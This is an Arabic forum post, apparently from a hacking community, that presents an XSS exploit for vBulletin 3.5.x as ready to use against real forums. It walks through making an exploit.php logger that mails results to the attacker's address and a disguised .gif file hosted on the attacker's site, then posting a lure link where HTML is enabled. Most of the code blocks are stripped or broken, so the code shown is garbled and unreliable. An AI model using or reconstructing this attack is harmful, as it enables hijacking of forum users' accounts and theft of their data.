Admin
صاحب الموقع
 عدد الرسائل : 473
العمر : 44
تاريخ التسجيل : 23/07/2006
 |  موضوع: Xss Vbulletin 3.5.4 ثغرة جديدة الإثنين 14 أغسطس - 21:47 | |
| بسم الله الرحمن الرحيم
أهلا بكم اعضاء منتديات منظمة الاختراق العالمية
نقدم اليوم ثغرة من احدث ثغرات الفبيولتين
وهى
Xss Vbulletin 3.5.x
مجربة على vBulletin 3.5.4
*-* طريقة الاعداد للثغرة *-*
ضع الكود التالى في ملف نوتباد ونسميه على سبيل المثال اكسبلويت بس لازم الامتداد زى ماهو:
exploit.php
كود:
<php>
<a href="log.php"></a><xx1>
<php>
<php>
غير < elmohaseb.net@hotmail.comالموجودة في الكود اعلاه الى ايميلك
الكود التالى حطه بنوتباد واحفظه بأمتداد gif طبعا بعد تغيير http://YOUR ADDRESS WEB.com الى اسم الموقع الي رفعت عليه ملف exploit.php
مثال ..... root.gif
كود:
</pre>
الان انتهينا من التحضير
*-* طريقة التطبيق *-*
1- أضف مشاركة جديدة ومن ضمن المشاركة حط الكود التالى
كود:
<a target="_blank">اكتب شئ مجذب للانتباه هنا</a> '
وارسل المشاركة ومبروك عليك
*-* شروط عمل الثغرة علشان لا حد يجى يقول الثغرة مش شغاله او فاشلة *-*
تفعيل خيارات الـ html لازم يكون on بالمنتدى | |
|
